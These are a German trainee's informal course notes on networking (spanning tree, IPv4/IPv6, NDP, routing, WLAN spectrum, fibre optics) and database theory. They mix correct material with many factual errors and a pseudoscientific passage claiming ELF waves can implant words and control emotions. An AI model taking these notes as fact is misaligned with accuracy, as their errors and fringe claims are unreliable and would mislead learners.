Es gibt auch schnelle spanning trees und switche unterscheiden sich in den Übertragungskosten, auch in ihrer Bauart. Man bestimmt in einem Netzwerk, welche Switche man braucht .. in dem kann man alle schnellen vorziehen.

Bridge: gibt’s als Hardwarekiste so nicht mehr. Heute noch wichtig.. - Verbindung zwischen zwei Netzwerken - wo wir noch eine Straße hatten: Kollision .. bridges halten den Datenverkehr dort, wo er benötigt wird. -Man kann Netze virtuell abschotten. - Oder gezielt Zugang schaffen, sonst ist virtuelles Virtual-Box-System durch NAT abgeschottet. - sie lässt jeden Broadcast auch wirklich rüber.. - an den Verknüpfungspunkten zu einer Bridge im Netzwerk ist immer ein Protokoll.

- Ein – Kabel – Netze waren früher Netzwerke.

Doku: Spanning Tree. ..

Programmieren: Beschäftigt sich hauptsächlich mit Mathematik Programmieren ist für die Root-Bridge von Bedeutung

..

DAS noch mal mit Sound machen: https://www.youtube.com/watch?v=En9nqOF_2rY Bridge Priority .. wiederholung.

Aber: Ein Switch weiß gar nicht, ob ein Server, oder ein Client an ihm dran hängt, und wo die Engpässe und Flaschenhälse sind..

Die Fahrtkosten der zweite Schritt sind: Welche Wege kappe ich am besten?

Immer die niederen Übertragungsgeschw. abgesch. Werden.

Bei einem anderen spanning tree – netzplan sind die zahlen, 3, 6, 1 .. .

Jeder Switch rechnet sich die Fahrtkosten zusammen, zur Rootbridge.

Je niedriger die Geschwindigkeit(also je langsamer), desto höhere imaginäre Pfadkosten fallen an.

Wenn ein paket höhere pfadkosten hat, wird es wieder zurückgeschickt, der Port geblockt.

Ports aushandeln machen sie nur einmal?

Das Protokoll bezieht sich auf jeden Port, also könne die Switche mehrfach mit Kabeln verbunden werden, um Ersatzkabel zur Verfügung zu haben!

.. Ipv4 wurde immer in dezimal geschrieben .. von 0 bis 255. Ipv6 ist hexadezimal

IPv4 kann auf vielen verschiedenen Medien aufsetzen, zum Beispiel auf serielle Schnittstellen (PPP oder SLIP), Satellitenverbindungen usw. Im LAN-Bereich wird heute fast immer Ethernet eingesetzt. android-tools-adb Bei der Adressierung entscheidend: Quell- und Ziel-IP.

Die beiden Standards RFC 791 und RFC 2474 sind dann kompatibel, wenn man die ersten 6 Bit auf Null setzt.

Total Length: Alle Hosts müssen Datagramme mit einer Länge von mindestens 576 Byte verarbeiten können.

Flags: Was sind noch mal flags?

Fragment Offset: Maximal 1025 Bit können in einem Internet-Datenpaket gesetzt werden. Dafür ist der 13 Bit breite Fragment Offset im ipv4-Header zuständig.

TTL: Die Time to live (TTL, deutsch Lebenszeit) ist die Gültigkeitsdauer, die Daten in Rechnernetzen mitgegeben wird. Die Router zählen TTL Router .. das sind die Sprünge, die es braucht, bis ein Paket verworfen wird). Die ttl wird vom Server zu Server herunter gezählt. Unter 8 gibt es immer einen Error, weil es sieben Server auf dem Weg zur Fisicloud gibt. ?? wirklich ?? traceroute: Mit bis zu 35 hops soll man jeden rechner der Welt erreichen können.

Header Prüfsumme (checksum): Hatten wir mit ingo, wo er uns traceroute vorstellte. Mit bis zu 35 hops soll man jeden rechner der Welt erreichen können.

Dann kam noch was mit tcp/ip und subnetzmaske

Eine ip muss immer in eine mac-adresse aufgelöst werden, dann er folgt die Zustellung.

Ipv4 wurde immer in dezimal geschrieben .. von 0 bis 255. Ipv6 ist hexadezimal ! Im browser .. https://de.wikipedia.org/wiki/IPv4#IPv4_auf_Ethernet Von einem A-Netz kann man .genau . 256 B-Netze machen.. und c-netze? .. 16bit .. 65536. nur von 0-127 a-netze sollten vergeben werden. Von den b-netzen kann man 64000 machen ?? Ich vermute, jeder Rechner hat.. 2 gültige ip adressen immer: bei ipv6 ipv4: nur eine

Man kann auf einem Handy keinen webserver betreiben, weil es keine öffentliche IP hat .

224.0.0.0/4 Multicasts(ehemals Klasse-D-Netzwerk) Netzwerkkarte flackert bei jedem die led .. kommen bei jedem an !!

Nur das konkrete Abfordern des Dienstes berechtigt zum Empfang des Multicasts weltwelt. Von einem Router zu allen Routern gestreut wird .. oder ??

Ein Router kennt kein Absender?das kann man durch eine firewall blocken, hat nichts mit Multicast zu tun.

Wichtig für die Prüfung: „Die ganze blöde rechnerei mit den Adressen .. für die systemintegratoren sowieso, die anwendungsentw eventuell kanns auch erwischen.

Wieviele Netzwerke kann ich herausgeben z.b. .

überall wo subnetmask 0 ist und alles in der ip 1 ist, gilt der BC.

IP´s lösen nur einen Broadcast aus.. ingo erzählte uns, das dies die MAC's machen. Verwirrt … ????

Netzwerkbroadcast ..

Unter Windows „route print“ eingeben: dann hat man eine ganze ipv4-routingtabelle !! fe80 die lokalen Adressen ..

Ich vermute, jeder Rechner hat.. 2 gültige ip adressen immer: bei ipv6 ipv4: nur eine

..herr rüdiger stellte eine riesige liste vor .. muss sitzen bis zur püfung und es ging alles viel zu schnell .. ipv4 + routing: da kann man sich nochmal den packettracer anschauen .. im WAN laufen automatische Routungtabellen.

Satelliteninternet: alles läuft auf Schicht 1 .. Timesharing ..

.. will ich wissen was läuft im netz: ip-scanner.

Aus sicherheitsgründen antworten windows-kisten nicht mehr auf Ping. Man kann auf einem Handy keinen webserver betreiben, weil es keine öffentliche IP hat .. eine Fritzbox hingegen hat eine öffentliche IP, darum kommt man vom WAN auch per port forwarding (portweiterleitung) auf die Homepage, die ich über den Apache auf meinem Privatlaptop aufgesetzt habe. Handys haben immer nur eine IP .. oder, ist womöglich so eine MAC-Geschichte. ?? verwirrend..

18.10. Ipv6 mit Hr. Rüdiger: was der protokoll kann, ist schon enorm mehr die trennung für die Portnummer entfällt, weil Doppelpunkt. Deshalb wird die ipv6 in eckige Klammern gesetzt, und dahinter mit doppelpunkt die portnummer.

Subnetzmaske fällt weg, weil wir schreiben nur noch Präfix. Keine ellenlange Geschichte mehr mit 192 ausrechnen und Einsen etc.. .

Links: Netzwerkadresse, die das Netzwerk bezeichnen und rechts die hostadresse.

2hoch 64 Adressen kriegt jeder USER.

Sicherheit bei ipv6: Bei öffentlichen ips würde man alles erreichen, deshalb müsste jedes gerät so sicher sein, dass man nicht rein kann .. .

Hauptsächlich von innen wird angegriffen.

Ungefragt von außen pakete reinlassen, wenn man versehentlich ein pdf öffnet, dass kein pdf ist, aber der virus fängt dann zu arbeiten an, man kann Signaturen fälschen und wenn die firewall das nicht kennt, geht es durch. Udp

Was könnte denn ipv6, in der Sicherungsschicht?

Der Localhost: [::1/128 ] (127 0-Bits, ein 1-Bit) ab mitte xp gab es „apipa“. Es ist nach programmiert in ipv4. APIPA: Eine selbst zugewiesene IP-Adresse, wenn DHCP nicht funktioniert. Von windows zugewiesene ip´s, um mit netzwerkkomponenten unabhängig zu kommunizieren, wird aber mit ipv6 weg fallen.

Xp vier jahre auf den markt, ipv6 nicht gereeicht wer noch Hardware hat, die nicht auf ipv6 geeicht ist, die kann weg, außer, man hat ein Patch, falls es überhaupt möglich ist.

Ansprechbarer String, mit dem man die Netzwerkstelle unterscheidet.

[Fe80:]: Nachfolge-Pendant zu 192.168. .. . die bleibt uns so erhalten.

Unique local unicast: Global kontrolliert wird, reserviert, der fc-bereich. Damit sind die privaten Rechner-IP´s gemeint. DHCP ist für ipc6 wäre nicht mehr vorgesehen. Jeder Rechner hätte zwei statische ipv6-Adressen... die [fe80] und eine andere.

Es muss weltweit eine stelle geben, die entscheidungen zur vErgabe trifft. Windows: Route print

Multicast: Zitat: „[ff00::/8] (ff…) stehen für Multicast-Adressen. Nach dem Multicast-Präfix folgen 4 Bits für Flags und 4 Bits für den Gültigkeitsbereich (Scope).“

Mit Programm

Die kriegen es alle, ist BC, aber Router sagen: nein. Wieso? Weil ein router nur routet, nicht weiter leitet.

Es sei denn, man hat eine Multicast-Adresse.

Achtung: das klingt crass: [7:] (R-Bit gesetzt, erzwingt P- und T-Bit) Multicast-Adressen, welche die Adresse des Rendezvous-Point enthalten (RFC 3956)

Anycast: Zitat: „Anycast ist eine Adressierungsart in Computernetzen, bei der man über eine Adresse einen einzelnen Rechner aus einer ganzen Gruppe von Rechnern ansprechen kann.“ Ich stelle eine anfrage ans Netz und irgend einer wird schon antworten/wo wird man eine Antwort bekommen.. ?? nur eena solls kriegen, wa?

Man wird hingeroutet zur berliner Nummer, man kriegt das gar nicht mit.

Geocast: „Geocast ist ein Kommunikationsmechanismus, der sich auf das Übermitteln einer Nachricht in einem Netzwerk an ein räumlich abgegrenztes Gebiet bezieht.“ Man kann nicht nur drauf warten, ob man Antworten bekommt, wie beim Anycast, sondern dass auch die Schichten geographisch alles zulassen (bei Werbung, international).

„Bei dieser Adressierungsart wird mittels absoluter Koordinaten, beispielsweise angegeben im WGS84- Format (diese werden z.B. vom Global Positioning System verwendet), ein Gebiet beschrieben, an das dann die Nachrichten gesendet werden.“

Geil! Es gibt auch ein Global Positioning Sytem: „Das Global Positioning System (GPS; deutsch Globales Positionsbestimmungssystem), offiziell NAVSTAR GPS, ist ein globales Navigationssatellitensystem zur Positionsbestimmung.“ Achso, nur ein GPS! „Ein Vorteil ist dabei, dass GPS-Geräte nur Signale empfangen und nicht senden .“ Auch das noch!

Unicast: Zitat: „So kann im übertragenen Sinne das Senden eines Briefes an einen Empfänger als Unicast bezeichnet werden. .. Der Terminus Unicast ist in Analogie zu den Begriffen Broadcast, Multicast und Anycast gebildet, welche zur Klassifikation der Adressierung (Routing-Methoden) in der Netzwerkkommunikation verwendet werden.“

Cisco-Disco: 'ans Netz flanschen soll, starten und laufen.

Wenn ich eine IP habe: 7E3f::0815:3711/64 diese 64, nennt den Bitanteil des Netzanteils. 7E3F:0000:0000:0000 ist die Netzwerknummer.

Gibt es ein Gerät, dass eine feste IP hat.. ..welche Recher muss ich immer als feste IP haben: der Router

Warum muss ich vom Router immer die IP haben? Weil er in andere Netze verbindet

Der Router antwortet mit seiner Adresse und seinem Präfix. Dann: Localhost im Spiel .. man kriegt IP .. unser Rechner nimmt den Präfix, und füllt den Rest mit seiner FE-80-Adresse auf.

Neighbor Discovery Protocol (ersetzt ARP): Zitat: „NDP wird von den am IPv6-Netzwerk beteiligten Knoten benutzt, um die Link-Layer-Adresse von anderen am selben Netzwerk hängenden Knoten ausfindig zu machen (Ey Knoten, Rück deinen link layer raus, alter) und zum Aktualisieren der gecachten Adressen.“ Adressauflösung: „Um die Link-Layer-Adresse eines Knotens zu ermitteln, wird eine Neighbor-Solicitation-Nachricht per IPv6-Multicast an die sog. Solicited Nodes-Adresse des Ziels versendet.“

THIS is N.D.P! ..uter weist sich der Host eine link-lokale Adresse zu, die im Falle einer Ethernet-Schnittste.. .. aus deren Hardware-Adresse berechnet.. ..die Suche nach den Routern i..

Arp-Ersatz Knoten zu finden??

Um den netzwerktraffic im zaum zu halten, um nicht jedes Mal neu anzufragen.

Desatination Cache. Router-geschichten werden dort reingepackt. Apta-Cache.

Wenn man infos nicht mehr findet, fragt man neu an ..

Router- und Präfixvermittlung:

Versendung per Multicast. Wieso? Was muss Router für jede Karte extra rein? Die IP.

Jeder Client kann das Anfordern vom Router..

Er bekommt die Router-IP, Präfix und DNS, sogar denStandardgateway..

Adressauflösung: „Um die Link-Layer-Adresse eines Knotens zu ermitteln, wird eine Neighbor-Solicitation-Nachricht per IPv6-Multicast an die sog. Solicited Nodes-Adresse des Ziels versendet.“

Ausgeschaltete Rechner werden getaggt als abgelaufen.

ICMPv6-Typen .. Headertypen etc. hatten wir jetzt nicht gemacht. Ipv6 und das NDP: „Zur initialen Kommunikation mit dem Router weist sich der Host eine link-lokale Adresse zu, die im Falle einer Ethernet-Schnittstelle etwa aus deren Hardware-Adresse berechnet werden kann. Damit kann ein Gerät sich mittels des Neighbor Discovery Protocols (NDP, siehe auch ICMPv6- Funktionalität) auf die Suche nach den Routern in seinem Netzwerksegment machen.“ von 100 zu 200 der linklokale der Bereich, das ist eben so. und dhcpv6 ist entwickelt worden .. man braucht es eigentlich nicht mehr wenn man schon autconf von ipv6 macht, zusatzinformationen .. flags .. .

HOP LIMIT: Hop 8 Bit Maximale Anzahl an Zwischenschritten über Router, die ein Paket zurücklegen darf; wird Limit beim Durchlaufen eines Routers („Hops“) um eins verringert. Pakete mit null als Hop Limitwerden verworfen. Es entspricht dem Feld Time to Live(TTL) bei Ipv4. Achso, nur TTL ..

Mobile IPv6:

Da ist eine menge Code..

Übergangsmechanismen: Nur wenn man es braucht..

Zum lernen: Anki

Prüfung FIAE 2015 Sommer nach dem Netzwerkplan..

Dynamisches Routing

Rechner müssen optimalen Weg suchen.

Spanning tree auf routing-eben ..

Routingprotokolle ..

.. wir sollen die Vorteile aufzählen ..

Routingprotokoll in diesem Fall sinnvoll..

Um die ausfallsicherheit zu erhöhen, muss ein eRsatzrouter eingesetz werden ..

Dann hatten wir Routing mit Cisco Packet Tracer Apipa (zusammenführen): Findet der Rechner beim Start keinen DHCP-Server, verwendet der Rechner APIPA, um sich selbst eine gültige IP-Nummer zu beschaffen

Außerdem wurde uns gezeigt, wie die Subnetze in ipv6 berechnet worden sind. Das müsste aus meinem Ordner übertragen werden, weil enorm wichtig!

Ohne Datum WLAN mit Hr. Rüdiger

Wlan-Standards können !! (kommen hier noch rein)!

Es gibt übrigens so eine Oktave, die für das menschliche Ohr angenehm zu hören ist .. man hört sie z. B. zu Anfang von fade to grey.

Elektromagnetisches Spektrum:

(von ELF bis SHF)

Niederfrequenz:

ELF:

Das Frequenzspektrum menschlicher Gehirnströme, sichtbar gemacht im EEG, liegt im Bereich von 0 bis 50 Hz.

ELF-Wellen haben eine “natürliche“ Verwandtschaft zu den menschlichen Gehirnwellen und zu der natürlichen Schwingung der Erde (ca. 8Hz – aber steigend!!). Unser Gehirn ist im Wesentlichen für zwei Frequenzen empfänglich. Die eine ist der Mikrowellenbereich wie er auch für Handys benutzt wird und der andere ist der ELF Bereich (extremly low frequencies). ELF Frequenzen arbeiten im Bereich mit sehr tiefen Schwingungen von 1 bis 100 Hertz. ELF-Wellen haben die Fähigkeit, tief in die Erde einzudringen und sie haben auch die Fähigkeit, Krümmungen zu folgen. Mittels ELF-Wellen lassen sich nicht nur Worte ins Unterbewußtsein transportieren, sondern es ist auch möglich, die Gefühle eines Menschen zu steuern. Der Mensch hat verschiedene Gehirnwellenbänder im ELF-Bereich:  Delta (1-3 Hz.)…….Tiefschlaf, Koma  Theta (4-7 Hz.)…….Hypnose, Trance, Traum, tiefer Schlaf  Alpha (8-12 Hz.)……Meditation, Entspannung  Beta (13-40 Hz)…..Wachzustand bis höchste Erregung ..bis 30 Hz .. und mehrere hunderte von Kilometern lang.

Super Low Frequency (SLF): 30 bis 300 Hz

Ultra Low Frequency (ULF): 300 Hz (0,3Khz) bis 3000 Hz (3kHz)

Very Low Frequency (VLF): 3 – 30 kHz

Radiowellen:

Langwelle: 30 kHz bis 300 kHz

Mittelwelle: 300 kHz bis 1,5 Mhz

Kurzwelle (KW): 1,7 Mhz UltraKurzWelle Ukw: 30 bis 300 Mhz

Und dann...

IHHHHHHHHHHH! WLAN ist eine Mikrowelle!!

Zitat: „Dezimeterwellen (ultra high frequency) UHF Wellenlänge: 10cm bis 1 m Frequenz: 300 bis 3000 MHz Anwendung: Rundfunk und Amateurfunk und Mobilfunk“

WLAN ist im 2,4 GHZ und sogar .. im 5 GHZ-Bereich!! Zentimeterwellen, Millimeterwellen und Mikrometerwellen zählt man meist bereits zu den Mikrowellen.

Zentimeterwellen (super high frequency) SHF Wellenlänge: 1 bis 10 cm Frequenz: 3 bis 30 GHz Anwendung: Radar, Flugüberwachung

Radar-Flugüberwachung Boah ey: Radiowellen können durch Antennen detektiert werden! vielmehr treten die Teilcheneigenschaften einzelner Photonen, der Quanten des elektromagnetischen Feldes, in den Vordergrund.. jetzt wird es zu viel.. : „Eine direkte Krafteinwirkung (z. B. Richtungsänderung) auf eine sich ausbreitende elektromagnetische Welle kann nur durch das Ausbreitungsmedium erfolgen (siehe Brechung, Reflexion, Streuung und Absorption) bzw. vermittelt werden (siehe Nichtlineare Optik und Akustooptischer Modulator).“

Die Impedanz (lat. impedire „hemmen“, „hindern“), auch Wechselstromwiderstand, gibt das Verhältnis von elektrischer Spannung an einem Verbraucher (Bauelement, Leitung usw.) zur aufgenommenen Stromstärke an. Diese physikalische Größe wird im Allgemeinen vorteilhaft als komplexwertige Funktion der Frequenz angegeben. Anders als zum Beispiel Schallwellen benötigen elektromagnetische Wellen kein Medium, um sich auszubreiten. http://www.leifiphysik.de/optik/elektromagnetisches-spektrum/radiowellen

Wieso komme ich auf ELF-Wellen? Weil Hr. Rüdiger von WLAN-Standards sprach, die wir zur Prüfung kennen müssen .. da ging er kurz auf das elektromagnetische Spektrum ein.

Stell dir vor, man baut einen ELF-Sender, der Stimmen in das Gehirn anderer Menschen senden kann! Oder, man benutzt sein eigenes Gehirn dafür! Dann wäre Telepathie möglich!

…...... Fotorezeptor (Weitergeleitet von Photorezeptoren) Als Fotorezeptor oder Photorezeptor (auch Sehzellen) bezeichnet man zum einen auf zellulärer Ebene die spezialisierten lichtempfindlichen Sinneszellen eines Auges, beispielsweise die Stäbchen und Zapfen der Netzhaut. Zum anderen werden auf molekularer Ebene bestimmte lichtempfindliche Farbstoffe (Photopigmente) so genannt, die sich jeweils zusammensetzen aus einem unterschiedlichen Proteinanteil (z. B. Opsin) und verschiedenen Chromophoren (z. B. Retinal), beispielsweise die Sehfarbstoffe Rhodopsin bzw. Iodopsin in einer Lichtsinneszelle (Cellula optica bacilliformis als Stäbchenzelle bzw. coniformis als Zapfenzell Anders als zum Beispiel Schallwellen benötigen elektromagnetische Wellen kein Medium, um sich auszubreiten.

Saiten und rohre haben mit wellenwiderstand, wellenimpedanz zu tun.

Pineal Gland = Zirbeldrüse schüttet DMT aus. So ein D – M – Trip kommt, wenn wir meditieren, oder Ayahuasca uns einpfeifen. ELF-Frequenz: 8 Hz. Melatonin → wesentlich komplexer als DMT. Serotonin ist da ganz ähnlich, auch unter MDMA, Ecstasy bekannt. Fe-Rhun nimmt also regelmäßig Ecstasy. “Don't jump over the river until you say “hello”. Even then = sogar dann dedicated = gewidmet rohdiola ist eine Heilwurzel

Ebba Grön = Joakin Thaiström, Imperiet, Love, peace and pitbulls.

Thomas und Jamuna sprachen von Wellen, die der Mensch hauptsächlich über seine Zirbeldrüse ausstrahlt. ELF-Wellen?

HUMOR:

Verschwörungstheorie des Tages:

Bei Multimode-LWL's kommen nur LED's zum Einsatz, die das licht zu sehr streuen und nicht weit kommen.

Monomode-LWL's hingegen arbeiten mit Laser, das Licht bleibt im Kern des Leiters auf einem Punkt fixiert und kommt somit über 100 Kilometer weit..

..was ist wahr, was ist falsch??

Zitat: „Multimodefasern, in denen sich mehrere tausend Moden ausbreiten können, haben ein stark strukturiertes Strahlprofil (siehe Bild rechts). ... Deshalb zeigen Multimodefasern mit zunehmender Länge eine stärkere Signalverfälschung (Modendispersion) als Monomodefasern, die somit zur Signalübertragung über weite Strecken besser geeignet sind.“ Multimodefasern streuen das licht zu sehr, nicht Monomode-Fasern und deshalb kommen Monomode- Fasern weiter, wei sie das Signal nicht zu sehr streuen (haben auch kleineren Durchmesser)!

Zitat: „Patchkabel oder Anschlusskabel gibt es sowohl in Glasfaser- als auch in Kupfer-Ausführung (zum Beispiel Twisted-Pair- oder Twinax-(Koaxial)-Patchkabel für Ethernet oder InfiniBand).“ n Zitat: „Bei Kupfer-Patchkabeln bestehen die Adern im Kabel aus flexiblen Kupferlitzen im Gegensatz zu fest verlegten Kabeln, die aus massiven Drähten bestehen. Bei Glasfaser-Patchkabeln wird auf einen komplexen Kabelaufbau verzichtet und in der Regel bei Duplex auf flexiblere Zipcord- Varianten zurückgegriffen (zwei leicht trennbare separierte Lichtwellenleiter). Die Länge von Patchkabeln ist gewöhnlich etwa 0,3 bis 25 m, für längere Strecken werden meist fest installierte Verbindungen genutzt.“ also Verlegekabel. ... Das Patchkabel dient  zur Verbindung von Anschlüssen (Ports) eines Patchpanels (auch Rangierfeld genannt) mit Ports eines anderen Patchfeldes; diese Verbindung nennt man Patch oder Rangierung“ „Die beschriebenen Effekte machen sich in Form einer Dämpfungserhöhung bemerkbar, welche je nach Leistungsbudget, Streckenlänge und Biegung zum Totalausfall der Übertragung führen kann.“ „Verschiedene Dispersionseffekte tragen dazu bei, dass es während der Übertragung zu einer Verformung der dem Licht aufmodulierten Signalform kommt, was auf unterschiedliche Ausbreitungsgeschwindigkeiten verschiedener Signalanteile zurückzuführen ist“

Als Ingo mit uns Dovecot machte, hatten wir auch Squirrelmail installiert, was in PHP geschrieben ist.

Achtung: Jetzt kommen neun Seiten teilweise ziemliches Chaos:

19. 10. 2016: Datenbanktheorien mit Antje Osten

Die wesentliche Aufgabe eines DBS ist es, große Datenmengen effizient, widerspruchsfrei und dauerhaft zu speichern und benötigte Teilmengen in unterschiedlichen, bedarfsgerechten Darstellungsformen für Benutzer und Anwendungsprogramme bereitzustellen. c, c++, java, Android .. Informatikerin(vollstudiert), Pädagogin, selbstständig, findet hardware ist super bei cimdata

Programmierer duzen sich, bis zum Chef hoch .. american way of life.

Prüfungsrelevant: Modelle und Datenbank. Ein Datenbankmodell ist die theoretische Grundlage für eine Datenbank und bestimmt, auf welche Art und Weise Daten in einem Datenbanksystem gespeichert und bearbeitet werden können.

Anwendungsentwickler: Entweder Java oder c++. c++, weil man dann neue maschinen bauen kann, nicht wahr? Und: Man kommt in Java nicht mehr in den Speicher rein. unter macbook air ist unix drunter. in objective-c geschrieben, oder?

1. Entity(einheiten)-relationship-modell: Peter chen.

E-R-Modell:

Auftraggeber sagt, er hat einen Entity-Typ gefunden.

Unidirektionell und unicast

2. Relationmodell

3. struktur

Datenbanken modellieren – gerade Systemintegratoren werden über die Datenbanken abgefragt. Modellierungssprache?? Ich hatte gestern die ganze Zeit versucht, den Anfang von Antjes datenbanken.pdf zu entschlüsseln.. es ging u.A. um das entity-Relationship-Modell. Entites und Relationships können durch Attribute näher charakterisiert werden. Dabei handelt es sich um Eigenschaften, die für jedes Entity bzw. jede Relationship durch entsprechende Werte, die Attributwerte, konkretisiert wer- den.

Also ist ein Affe ein Entity, ein Objekt. Nicht charakerisiert heißt, er ist umsonst, hat eine Farbe, benötigt Essen, hat eine unterschiedliche Größe .. und Attribute werden konkretisiert, indem der eine weiß, der andere schwarz, der eine mehr frißt, der andere weniger frißt, der eine mehr, der andere weniger sexsüchtig ist, also der eine Affe mehr, der andere Affe weniger mit seinem Penis schwingt, oder? der Relationshiptyp „ist wo?“ der in diesem Fall keine speziellen Attribute hat (aber auch welche haben könnte). Ein wichtiges Charakteristikum Relationshiptypen ist ihre Kardinalität. Dadurch wird zum Aus- druck gebracht, mit wie vielen Entities ein gegebenes Entity in Beziehung stehen kann.

Aber sicher ist das alles nicht. Am monat unbedingt noch mal Antje fragen.. !! sie solls mir nicht übel nehmen, wenn ich vielleicht “schwer von Begriff” bin.

Das Datenbankmanagementsystem isoliert die Datenbank von den Anwendungsprogrammen.

Das Entity-Relationship-Modell (ER-Modell) ist ein Datenmodell, das sich gut zur Darstellung des konzeptuellen Datenbankschemas für relationale Datenbanksysteme eignet. Dazu steht eine graphische Notation in Form des Entity-Relationship-Diagramms (ER-Diagramm) zur Verfügung.

Dann Kardinalität: Die Funktionalität muss beim Datenbankentwurf durch die Analyse der Rahmenbedingungen erkannt werden. Man unterscheidet die Funktionalitäten 1:1, n:1, 1:n und n:m Bei ihr hatten wir Verhältnisformeln: 1:1, 1:n & n:m.

1:1 Zu jedem Element der ersten Menge gehört genau ein Element der zweiten Menge und umgekehrt. Beispiel: Heirat

Also 1:1 usw. nennt man Funktionalität. Unterschied zwischen kardinalität und Funktionalität??

Und wenn jemand uns unterrichtet, ist es eine unverrückbare 1:1-Beziehung, ein schüler in Bezug zur Klasse allerdings eine 1:n – Beziehung, weil er zur Klasse gehört! Aber, wenn zwei Schüler Fußball spielen und einer macht noch nebenher Kung-Fu, macht der andere Schüler nicht automatisch mit Kung-fu (wär ja schön, eigentlich). Das wäre eine m:n-Beziehung!

Das war die Kardinalität. Das wird toll in einer Grafik erklärt.

M zu N-Beziehungen. Sie hat auch pdf's in denen das noch mal drin steht. Weniger geht es um Mastertabellen und Fahrertabellen (auch sklaventabelle genannt).

Die Mastertabelle erkennt man anhand des Primärschlüssels, in SQL Primary key. Von ihr geht die Beziehung aus.

Jeder Sklave muss zu einem gewissen Master gehören. Die fahrertabelle darf .. ... die zu keinen Team gehören.

In meinem Ordner steht: Kardinalität wegtun Schlüssel

Herr Maier Otto. Allein? Nein

Herr Mauer Otto Berlin allein?

Bei n zu m muss es immer dann eine Zwischentabelle werden.

Es gibt auch eins zu nix.. ??

Etwas kann eine Eigenschaft, aber viele Attribute haben. Ein dozent kann viele Kurse geben.

Auto increment primary_key: Ein Primärschlüssel darf nur einmal vorkommen und identischer Datensatz eindeutig. ??

1. Shema: Entity-Modell 2. Shema: Tabellenmodell 3. Shema: Relationenshema Warum erstens, weitens drittens??

Backups: Muss außerhalb des Risikobereichs sein (Außerhalb des Hauses, oder der Stadt).

Transaktion: alles-oder-nichts-Prinzip.

Generationenprinzip 1. Generation: Maschinensprache 01101001010010110 2. Generation: Assember 1:1 Übersetzung im maschinensprache Cli: add 37 Erst kommt, was gemacht wird, in den Prozessor. Dann die Zahlen. Wer Reverse Engineering macht, sollte Assembler beten 3. Generation Hochsprachen 1: n PHP: echo “hello”; Adaflex 1. Programm der Welt

PHP, ruby Phthon sind für den Anwendungsfall geboren worden, daher Skriptsprachen genannt, oder?

C++, java, c# → können alles. Wie alles? Der gemeine Compiler unter c++ baut das Programm zusammen .. und der Compiler sollte für jedes Betriebssystem gebaut sein.

Der Interpreter führt zeile für Zeile aus und braucht immer ein Wirtsprogramm, das ausführt. PHP ist noch zum Teil interpretiert.

Die Runtime Environment von Java ist in C geschrieben. 4. Generation: Befehlssprachen SQL 5. Generation: KI (schache, starke) schwache: siri.

Starke: Haskell, clojurl, lisp, Prolog

Prozedural ist: c, pascal, php, Ruby kann auch prozedural Objektorientiert: Smalltalk, c++, Java, php kann auch pbjektorientiert, c#, Ruby Funktional: Jscript An anderer Stelle wird gesagt, js sei objektorientiert.

Was ist eine Datenbank? Curlingham: Erfand c. Biales tostrup: Erfinder von c++.

Eine Datenhaltung ist Dateibasiert.

Ohne Netzwerk: Inkonsistent, Redundanz

Was ist inkonsistenz? Nicht gleich, nicht synchronisiert Redundanz hängt eng mit der Inkonsistenz zusammen.

Ein Datenbanksysten ist eine abstraktion; Datenbanksysten DBMS = Datenbankmanagement-System : Posgresql. Dann Daten.

Lerne durch schreiben.

Datenbanksysteme: DBS – relationale Datenbanksysteme .. mit objektwrapper objektorientierte Spachen ablegen. Objektorientiertes Datenbanksysteme .. wurde nicht die Zukunft. Filebasierte Datenbanksysteme NoSql (englisch für Not only SQL) = Nichtrelationale Datenbanken = ist die Zukunft

Was sind überhaupt relationale und objektorientierte, oder file basierte Datenbanken??

Alte: Netzwerkorientierte Datenbanksysteme Hierarchische (noch in banken) Datenbanksysteme

Es sei besser, im Chaos unter allen windwosusern unterzugehen.

Leute, die Linux nutzen, können sich schützen .. switcher hat er, und tut so, als sei er windows-explorer ..opera??

Algroithmus um die Welt, hash-Werte .. daten doppelt und dreifach abgelegt werden.. wenn man bei facebook wartet: es muss sich durch einen algorithmus synchronieren Das nichtrelationale Datenbanksystem ??? vn Das managementsysteme

Mongo, mariaDB, ist nichtrelational.. „Mit einfacher Skalierbarkeit, hoher Flexibilität und einem effizienten Dokument-orientierten Ansatz macht die nicht-relationale Datenbank "MongoDB" dem bewährten MySQL-System zunehmend Konkurrenz. .. Das Stichwort lautet hier "NoSQL". Der Begriff steht, anders als zunächst von den meisten erwartet, nicht für "kein SQL", sondern für "nicht nur SQL" (Not only SQL). Die unklare Bezeichnung sollte also nicht als Kampfansage gegen traditionelle Datenbanken verstanden werden. Ziel des neuen Ansatzes ist es vielmehr, relationale Datenbanken sinnvoll zu ergänzen wo sie Defizite aufzeigen. Entstanden ist dieses Konzept in erster Linie als Antwort zur Unflexibilität, sowie zur relativ schwierigen Skalierbarkeit von klassischen Datenbanksystemen, bei denen die Daten nach einem stark strukturierten Modell gespeichert werden müssen. .. Wie der US-Blog TechCrunch im Juni 2011 berichtete, musste die IT-Landschaft des populären Informations-Netzwerks zu dem Zeitpunkt bereits rund 200 Millionen Tweets am Tag bewältigen. Ein Jahr zuvor waren es "nur" 65 Millionen. Bei solchen datenintensiven Applikationen leiden relationale Datenbanken üblicherweise unter Leistungsproblemen und stoßen oft an ihre Grenzen. Aus diesem Grund setzt Twitter neben MySQL mittlerweile auch auf NoSQL-Lösungen, um die Verfügbarkeit und Performance seines Dienstes zu verbessern.“ Nicht relationale DBS sind schnell!!

Oracle = da darf man nicht viel selber machen .. da müssen für 2000 Euro Leute eingeflogen werden.

Posgressql, MicrosoftSQLserver, Sqlite.

Access = mehr als 10 Zugriffe schaffen wir nicht …

Ein DBS istr ein System z. Elektron Datenverarb

Sie ist eine integrierte Ansammlung von Daten, die allen Benutzern eines Anwendungsbereichs als gemeinsame Basis aktueller Informationen dient.

Integrierte = Mit den logsichen Zusammenhang der welt abgespeichert. Nicht die rucksäcke mit den dozenten .. recall = Datensatz domäne = anwendungsbereich, nicht die webdomäne

Informationen = immer aktuell sein .. synchronisierte zugriffe, ohne dass Datren zerschossen werden . . . trad dateisystem war eng mit d programm verbunden

..

DBMS hat traditionelle Datenbankverarbeitung abgelöst .. ..einheitlicher Speicherort.. ..ein Server ist eine software, die installiert wird.

Ohne Datum Java Schript:

JavaScript wird für Anwendungsprogramme genutzt. Beispielsweise ist sie die Sprache, in der die Datenbank MongoDB (NoSQL) ihre Abfragen formuliert

